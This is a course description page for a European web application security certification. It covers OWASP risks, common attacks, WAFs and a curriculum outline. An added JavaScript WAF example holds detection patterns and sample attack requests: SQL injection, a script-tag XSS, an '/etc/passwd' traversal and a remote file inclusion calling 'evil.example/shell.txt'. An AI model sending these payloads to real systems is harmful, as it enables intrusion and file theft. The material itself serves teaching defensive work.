EITC/IS/WASF Web Applications Security Fundamentals

by admin / Monday, 18 October 2021 / Published in Uncategorized
Price: €110

EITC/IS/WASF Web Applications Security Fundamentals is the European IT Certification programme on the theoretical and practical aspects of World Wide Web services security. It ranges from the security of basic web protocols, through privacy, threats and attacks on the different layers of web network communication and web server security, to security in the higher layers, including web browsers and web applications, as well as authentication, certificates and phishing.

The curriculum of EITC/IS/WASF Web Applications Security Fundamentals covers an introduction to web security with a review of HTML and JavaScript; the web protocols DNS and HTTP, cookies and sessions; cookie and session attacks; the Same Origin Policy, Cross-Site Request Forgery and exceptions to the Same Origin Policy; Cross-Site Scripting (XSS) and its defenses; web fingerprinting and privacy on the web; denial of service, phishing and side channels; injection attacks and code injection; transport layer security (TLS) and attacks on it; HTTPS in the real world; authentication and WebAuthn; managing security concerns in a Node.js project; server security, safe coding practices and local HTTP server security; DNS rebinding attacks; browser attacks, browser architecture and writing secure browser code. The programme follows the structure below, with comprehensive video didactic content as a reference for this EITC Certification.

Web application security is a subset of information security that focuses on website, web application, and web service security. Web application security, at its most basic level, is based on application security principles, but it applies them particularly to the internet and web platforms. Web application security technologies, such as Web application firewalls, are specialized tools for working with HTTP traffic.

The Open Web Application Security Project (OWASP) offers free and open resources and is run by the non-profit OWASP Foundation. The OWASP Top 10 – 2017 is the outcome of a study based on extensive data gathered from over 40 partner organizations; approximately 2.3 million vulnerabilities were detected across over 50,000 applications in this data. According to the OWASP Top 10 – 2017, the ten most critical web application security risks are:

  • Injection
  • Broken Authentication
  • Sensitive Data Exposure
  • XML External Entities (XXE)
  • Broken Access Control
  • Security Misconfiguration
  • Cross-Site Scripting (XSS)
  • Insecure Deserialization
  • Using Components with Known Vulnerabilities
  • Insufficient Logging and Monitoring

Hence, the practice of defending websites and online services against security threats that exploit weaknesses in an application's code is known as web application security. Content management systems (e.g., WordPress), database administration tools (e.g., phpMyAdmin) and SaaS applications are all common targets of web application attacks.

Web applications are considered high-priority targets by the perpetrators because:

  • The intricacy of their source code, which makes unattended vulnerabilities and malicious code modification more likely.
  • High-value rewards, such as sensitive personal information obtained through successful source code tampering.
  • Ease of execution, because most attacks can be readily automated and deployed indiscriminately against thousands, tens of thousands or even hundreds of thousands of targets at once.
  • Organizations that fail to safeguard their web applications are vulnerable to attack. This can lead to data theft, strained client relationships, cancelled licenses and legal action, among other things.

Vulnerabilities in websites

Input/output sanitization flaws are common in web applications, and they’re frequently exploited to either change source code or get unauthorized access.

These flaws allow for the exploitation of a variety of attack vectors, including:

  • SQL Injection – When a perpetrator manipulates a backend database with malicious SQL code, information is revealed. Illegal list browsing, table deletion and unauthorized administrator access are among the consequences.
  • Cross-site Scripting (XSS) – An injection attack that targets users in order to gain access to accounts, activate Trojans or change page content. When malicious code is injected directly into an application and stored there, this is known as stored XSS. When malicious script is reflected from an application back into a user's browser, this is known as reflected XSS.
  • Remote File Inclusion – This form of attack allows an attacker to inject a file into a web application server from a remote location. This can lead to dangerous scripts or code being executed within the application, as well as data theft or modification.
  • Cross-site Request Forgery (CSRF) – A type of attack that can result in an unintended transfer of funds, password changes or data theft. It occurs when a malicious web page instructs a user's browser to perform an unwanted action on a website to which the user is logged in.

In theory, effective input/output sanitization might eradicate all vulnerabilities, rendering an application impervious to unauthorized modification.

However, because most programs are in a perpetual state of development, comprehensive sanitization is rarely a viable option. Furthermore, apps are commonly integrated with one another, resulting in a coded environment that is becoming increasingly complex.

To avoid such dangers, web application security solutions and processes, such as PCI Data Security Standard (PCI DSS) certification, should be implemented.

Web application firewall (WAF)

WAFs (web application firewalls) are hardware and software solutions that protect applications from security threats. These solutions are designed to inspect incoming traffic in order to detect and block attack attempts, compensating for any code sanitization flaws.

WAF deployment addresses a crucial criterion for PCI DSS certification by protecting data against theft and modification. All credit and debit cardholder data maintained in a database must be safeguarded, according to Requirement 6.6.

Because a WAF is placed at the network's edge, in front of the DMZ, deploying one usually does not require any changes to the application. It then serves as a gateway for all incoming traffic, filtering out dangerous requests before they can interact with the application.

To assess which traffic is allowed access to an application and which has to be weeded out, WAFs employ a variety of heuristics. They can quickly identify malicious actors and known attack vectors thanks to a regularly updated signature pool.

Almost all WAFs may be tailored to individual use cases and security regulations, as well as combating emerging (also known as zero-day) threats. Finally, to acquire additional insights into incoming visitors, most modern solutions use reputational and behavior data.

In order to build a security perimeter, WAFs are usually combined with additional security solutions. These could include distributed denial-of-service (DDoS) prevention services, which give the extra scalability needed to prevent high-volume attacks.
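The signature matching described above, as an added example that is not part of the course materials: a minimal WAF-style request filter with a small constructed signature pool, run over constructed request lines. The rule names, the sample requests and the inspect() function are this example's own; it also shows the limit the text notes, in that a signature pool only catches what it already knows.

```javascript
// Added example (not part of the EITC/IS/WASF materials): a minimal signature-based
// request filter of the kind a WAF runs in front of an application. The signature
// pool and the sample requests are constructed for illustration.
const SIGNATURES = [
  { id: 'sqli-tautology', re: /'\s*(or|and)\s+\d+\s*=\s*\d+/i, cls: 'SQL injection' },
  { id: 'sqli-comment',   re: /--(\s|$)|\/\*/,                  cls: 'SQL injection' },
  { id: 'xss-script-tag', re: /<\s*script/i,                    cls: 'XSS' },
  { id: 'xss-event',      re: /\bon(error|load|click)\s*=/i,    cls: 'XSS' },
  { id: 'path-traversal', re: /\.\.\//,                         cls: 'Path traversal' },
  { id: 'rfi-url-param',  re: /[?&]\w+=(https?|ftp):\/\//i,     cls: 'Remote file inclusion' },
];

// Decode once so percent-encoded variants of a payload hit the same rule.
// decodeURIComponent throws on malformed sequences; treat that as suspicious too.
function normalize(target) {
  try { return decodeURIComponent(target.replace(/\+/g, ' ')); }
  catch { return null; }
}

// Inspect one request line ("METHOD target") and return the decision plus the
// ids of the signatures that fired, in signature-pool order.
function inspect(requestLine) {
  const [, target = ''] = requestLine.split(' ');
  const decoded = normalize(target);
  if (decoded === null) return { allow: false, matched: ['malformed-encoding'] };
  const matched = SIGNATURES.filter((s) => s.re.test(decoded)).map((s) => s.id);
  return { allow: matched.length === 0, matched };
}

// Constructed sample traffic: two benign requests followed by four attack attempts.
const SAMPLE_REQUESTS = [
  'GET /search?q=winter+boots',
  'GET /account/orders?id=1042',
  'GET /search?q=%27%20OR%201%3D1%20--',
  'GET /comment?text=<script>alert(1)</script>',
  'GET /download?file=../../etc/passwd',
  'GET /page?include=http://evil.example/shell.txt',
];

// Run the pool over a batch and return one decision record per line.
function triage(lines) {
  return lines.map((line) => ({ line, ...inspect(line) }));
}
```

A novel payload that matches no rule is allowed through, which is why the text treats a WAF as compensating for, not replacing, application-side sanitization.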

Checklist for web application security
There are a variety of approaches for safeguarding web apps in addition to WAFs. Any web application security checklist should include the following procedures:

  • Collecting data — Go over the application by hand, looking for entry points and client-side code. Classify content that is hosted by a third party.
  • Authorization — Test the application for path traversals, vertical and horizontal access control issues, missing authorization and insecure direct object references.
  • Cryptography — Secure all data transmissions. Has all sensitive information been encrypted? Have any algorithms been used that are not up to standard? Are there any randomness errors?
  • Denial of service — Test for anti-automation, account lockout, HTTP protocol DoS and SQL wildcard DoS to improve the application's resilience against denial of service attacks. This does not cover protection against high-volume DoS and DDoS attacks, which require a mix of filtering technologies and scalable resources to resist.

For further details, one can check the OWASP Web Application Security Testing Cheat Sheet (it’s also a great resource for other security-related topics).

DDoS protection

DDoS assaults, or distributed denial-of-service attacks, are a typical way to interrupt a web application. There are a number of approaches for mitigating DDoS assaults, including discarding volumetric attack traffic at Content Delivery Networks (CDNs) and employing external networks to appropriately route genuine requests without causing a service interruption.

DNSSEC (Domain Name System Security Extensions) protection

The domain name system, or DNS, is the Internet's phone book: it determines how an Internet client, such as a web browser, finds the relevant server. Bad actors hijack this DNS request process through DNS cache poisoning, on-path attacks and other means of interfering with the DNS lookup lifecycle. If DNS is the Internet's phone book, DNSSEC is unspoofable caller ID: a DNS lookup can be protected using the DNSSEC technology.

To acquaint yourself in detail with the certification curriculum, you can expand and analyze the table below.

The EITC/IS/WASF Web Applications Security Fundamentals Certification Curriculum references open-access didactic materials in video form. The learning process is divided into a step-by-step structure (programmes -> lessons -> topics) covering the relevant curriculum parts. Unlimited consultancy with domain experts is also provided.
For details on the Certification procedure, check How it Works.

Certification Programme Curriculum

  • Introduction (1 topic)
    • Introduction to web security, HTML and JavaScript review
  • Web protocols (1 topic)
    • DNS, HTTP, cookies, sessions
  • Session attacks (1 topic)
    • Cookie and session attacks
  • Same Origin Policy (2 topics)
    • Cross-Site Request Forgery
    • Exceptions to the Same Origin Policy
  • Cross-site scripting (2 topics)
    • Cross-Site Scripting (XSS)
    • Cross-Site Scripting defenses
  • Web fingerprinting (1 topic)
    • Fingerprinting and privacy on the web
  • DoS, phishing and side channels (1 topic)
    • Denial-of-service, phishing and side channels
  • Injection attacks (1 topic)
    • Code injection
  • TLS attacks (1 topic)
    • Transport layer security
  • HTTPS in the real world (1 topic)
    • HTTPS in the real world
  • Authentication (2 topics)
    • Introduction to authentication
    • WebAuthn
  • Managing web security (1 topic)
    • Managing security concerns in Node.js project
  • Server security (2 topics)
    • Server security: safe coding practices
    • Local HTTP server security
  • DNS attacks (1 topic)
    • DNS rebinding attacks
  • Browser attacks (1 topic)
    • Browser architecture, writing secure code
  • Practical web applications security (1 topic)
    • Securing web applications with modern platform features
    © 2008-2023  European IT Certification Institute
    Brussels, Belgium, European Union